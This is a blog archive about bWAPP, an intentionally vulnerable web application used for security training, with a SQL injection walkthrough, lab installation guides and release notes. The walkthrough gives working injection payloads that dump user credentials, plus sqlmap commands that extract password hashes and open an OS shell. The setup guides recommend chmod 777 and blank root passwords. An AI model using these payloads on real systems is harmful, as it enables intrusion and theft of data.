Monday, January 21, 2013

bWAPP - SQL injection

Is bWAPP vulnerable for SQL injection? Yes of course. This is the purpose of bWAPP, our extremely buggy web application. It has some nice injection issues... I made them intentionally, remember?

No... I will not explain in detail what SQL injection is!
A SQL injection attack is probably the easiest attack to prevent, while being one of the least protected against forms of attack. The core of the attack is that a SQL command is appended to the back end, usually through of a form field in the website or web application, with the intent of breaking the original SQL statement and then running the SQL statement that was injected into the form field. I'm sure you can find enough tutorials on the Internet about SQL injection. Here's an example of a pretty nice article.

Yes... I will explain how to exploit bWAPP using SQL injection and how to take ownership of the  database and even the underlying operating system. Definitely!



Currently there are 5 bugs in bWAPP related to SQL injection:
  • the Search page,

    where you can search for a movie(s) using a search string. The movie(s) details will be displayed as a result of your search.
     
  • the Select page,
     
    where you can select a specific movie from a drop-down list.
     
  • the Login page,

    where you can enter your credentials to login.
     
  • the Blind SQL injection page,

    where you also can search for a movie. The application will tell you if the movie exists or not. You will not see the movie details... maybe that's the reason why I called this the Blind SQL injection page :)
     
  • and where is bug number 5?

    A little challenge for you... somewhere in the application there is an issue with a SQL insertion. It's up to you to tell us where. Please give us your feedback @MME_IT.



The Search page

Here you can search for a movie(s) using a search string. The movie(s) details will be displayed as a result of your search. If you click the search button without entering any search string then all movies will be displayed.



The injection symptoms: when entering a single quote (') in the title field we receive the following message:

'Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1'

I love that message!

Here we go for some basic SQL injection fun:

blah' or 1=1--

results in all the records:



blah' or 1=2--

results in 0 records:



So the URL parameter title is definitely susceptible to SQL injection:

http://localhost/bWAPP/sqli_1.php?title=blah'+or+1=1--%20&action=search


What's next? Do you want to view some data not intended for you? I mean some real confidential information! Of course you want, let's go...

You could use the SQL union statement to merge database tables.
First of all you need to ensure that you use the same number of columns as the original SQL statement when using the SQL union statement!

blah' union select 1--

results in the following message:




After a while you will discover that you should use 6 columns:

 
blah' union select 1,1,1,1,1,1--

results in:



And that's great!
Now we can play with the field order and visualize the current database version:

blah' union select 1,DATABASE(),1,1,1,1-- 



We have found the name the of the current database name: bWAPP

Now our mission is to retrieve the table names of the current database:


blah' union select 1,table_name,1,1,1,1 from INFORMATION_SCHEMA.TABLES where table_schema=database()--



We have 3 tables: blog, movies and users. I think we should go for the data in the table users :)

We want to retrieve the column names for the table users:

blah' union select 1,column_name,1,1,1,1 from INFORMATION_SCHEMA.COLUMNS where table_name='users' and table_schema=database()--



The column names login, password, email and secret look interesting. We want those values!

blah' union select 1,login,password,email,secret,1 from users--



OK, we have the values! We exploited the underlying database by retrieving some confidential data. Apparently it seems that the password value is stored in a hashed state and cannot be retrieved. Those guys from MME are doing a great job...

After 10 seconds, 1 password was already cracked using John :p



Of course, we knew that the password for user bee was bug. I'm just trying to convince you to use complex passwords!

Let's summarize, we retrieved some data that was not intended for us. We retrieved the password hashes and we cracked a password. What's next?

Right... we will takeover the database and the underlying operating system. One of my favorite tools for doing that is sqlmap.

sqlmap is an open source pentesting tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections (source: sqlmap.org). It is written in python.



We can automate the previous commands with sqlmap.

This dumps the current database version and the database names:

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" 
--cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --dbs




This dumps the table fields, it even cracks automatically the passwords:

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0"
-D bWAPP -T users -C login,email,password,secret --dump



Using sqlmap we also have the possibility to create a shell with the underlying operating system. Actually the tool will upload a web shell that runs your favorite OS commands. A very nice and powerful tool. Thank you Bernardo and Miroslav!

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --os-shell



Conclusion

SQL injection can have disastrous consequences, no doubt about it.

Feel free to test for SQL injection vulnerabilities using the bWAPP web application. As you know there are 5 different bugs related to SQL injection. You can download bWAPP from here. Don't forget to set the security level to low or medium. With security level high you will notice that SQL injection is no longer applicable. With security level high we are validating every user input. This is done with the MySQL real escape string function and with prepared statements.

If you want to know more about SQL injection and tools like sqlmap, don't hesitate to subscribe for our ITSEC training. Or just invite me to your security event. It would be an honor for me to speak at your event!

Regards

Malik

Sunday, January 20, 2013

bWAPP - Samurai WTF

In one of the the previous articles I described the necessary steps to install bWAPP or a buggy web application. That was pretty easy.

In this article I will demonstrate the installation and configuration of bWAPP on the Samurai Web Testing Framework.

The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web penetration testing environment. The image contains the best of the open source and free tools that focus on testing and attacking websites.

 


Once you have booted Samurai WTF you can copy the bWAPP tar file to the desktop.
Extract it from here. A new directory 'bWAPP' will be created.
Syntax
cd /home/samurai/Desktop/
unzip bWAPP.zip



Move the directory 'bWAPP' and its entire content to the folder '/var/www'. You need root privileges!
Syntax
sudo su
mv /home/samurai/Desktop/bWAPP /var/www

Edit the file 'admin/settings.php'. Use the Samurai MySQL settings.
You need to change the password to 'samurai'. Yes... the password of the MySQL root user on Samurai is actually 'samurai'.



Browse to the file 'install.php' in the directory 'bWAPP'. Click 'here'.
The database 'bWAPP' will be created and populated.



Go to the login page. You can login with the default credentials (bee/bug) or you can make a new user. It's up to you!



You are ready to explore and exploit the bee!
Choose your favorite bug and a security level (low - medium - high).



If you have questions or if you want to help me with this project, don't hesitate to contact me! I speak human...

Enjoy!

Regards

Malik Mesellem
https://twitter.com/MME_IT

Monday, January 14, 2013

bWAPP - Metasploitable

In the previous article I described the necessary steps to install bWAPP or a buggy web application. That was pretty easy.

In this article I will demonstrate the installation and configuration of bWAPP on Metasploitable.

Metasploitable is an intentionally vulnerable Linux virtual machine. The VM can also be used to provide security training, test security tools, and practice common penetration testing techniques. It runs on any recent VMware product and other visualization technologies such as VirtualBox, VMFusion, Hyper-V,... Thank you HD Moore and Rapid7!



You can download the image file of Metasploitable 2 from here. The default login and password is msfadmin/msfadmin.

Once you have booted the Metasploitable VM you can copy the tar file to the temp directory. Extract it from here. A new directory 'bWAPP' will be created. 
Syntax
cd /tmp
unzip bWAPP.zip



Move the directory 'bWAPP' and its entire content to the folder '/var/www'. You need root privileges!
Syntax
sudo su
mv /tmp/bWAPP /var/www

Go to the bWAPP directory and give full permission to the directories 'passwords' and 'images'. This step is optional but it will give you so much fun when exploiting bWAPP with tools like sqlmap and Metasploit!
Syntax

chmod 777 images/
chmod 777 passwords/


Edit the file 'admin/settings.php'. Use the Metasploitable MySQL settings.
Yeah you're right, there's nothing to change. The MySQL root user on Metasploitable has a blank password.



Browse to the file 'install.php' in the directory 'bWAPP'. Click 'here'.
The database 'bWAPP' will be created and populated.



Go to the login page. You can login with the default credentials (bee/bug) or you can make a new user. It's up to you!



You are ready to explore and exploit the bee!
Choose your favorite bug and a security level (low - medium - high).



If you have questions or if you want to help me with this project, don't hesitate to contact me! I speak human...

Enjoy!

Regards

Malik Mesellem
https://twitter.com/MME_IT

bWAPP - Installation

It is pretty easy to install bWAPP or a buggy web application. In order to do that, you have to meet some requirements first.

These are the requirements:
  • an operating system: Windows, Linux, Unix, Mac OS,...
  • a web server (Apache, IIS,...)
  • the PHP extensions
  • a MySQL installation
  • (or you could install WAMP or XAMPP)
No! I will not explain how to install Apache/IIS, PHP and MySQL.




An overview of the installation steps:

1)  Extract the 'zip' file.
Example
unzip bWAPP.zip
2)  Move the directory 'bWAPP' and its entire content to the root of your web server.

3)  Give full permission to the folders 'passwords' and 'images'.
Example
chmod 777 passwords/
chmod 777 images/
4)  Edit the file 'admin/settings.php' with your own database connection settings.
Example
$db_server = "localhost"; // your database server (IP/name), here 'localhost'
$db_username = "root";  // your MySQL user, here 'root'
$db_password = "";  // your MySQL password, here 'blank'
5)  Browse to the file 'install.php' in the directory 'bWAPP'.
Example
http://localhost/bWAPP/install.php
6)  Click on 'here' (Click 'here' to install bWAPP).
The database 'bWAPP' will be created and populated.
7)  Go to the login page. If you browse the bWAPP root folder you will be redirected.
 Example
http://localhost/bWAPP/
http://localhost/bWAPP/login.php
8)  Login with the default credentials or make a new user.
default credentials: bee/bug
9)  You are ready to explore and exploit the bee!

Another option is to download bee-box. bee-box is a custom Linux VMware virtual machine pre-installed with bWAPP.  bee-box gives you several ways to hack and deface the bWAPP website. It's even possible to hack the bee-box to get root access...
With bee-box you have the opportunity to explore all bWAPP vulnerabilities!

This project is part of the ITSEC GAMES project. ITSEC GAMES are a fun approach to IT security education. IT security, ethical hacking, training and fun... all mixed together.
Enjoy!

Regards

Malik Mesellem
@MME_IT

Thursday, January 10, 2013

bWAPP - Bug fixes and new features

bWAPP, or a buggy web application, is a deliberately insecure web application. It helps security enthusiasts, systems engineers, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful web application penetration testing and ethical hacking projects. It is made for educational purposes.

What makes bWAPP so unique? Well, it has over 100 web bugs! bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project.

Download bWAPP from here.



Another possibility is to download our bee-box, a custom Linux VM pre-installed with bWAPP. bee-box gives you several ways to hack and deface the bWAPP web application. It's even possible to hack the bee-box to get full root access... With bee-box you have the opportunity to explore all bWAPP vulnerabilities. Hacking, defacing and exploiting without going to jail... how cool is that!?!

Download bee-box from here.



Current version: bWAPP v2.1

Release date: 27/09/2014

Total bugs: > 100

New bugs
  • Base64 Encoding (Secret)
  • Broken Authentication - CAPTCHA Bypassing
  • Cross-Site Scripting - Stored (User-Agent)
  • iFrame Injection
  • Shellshock Vulnerability (CGI)
  • SQL Injection - Stored (User-Agent)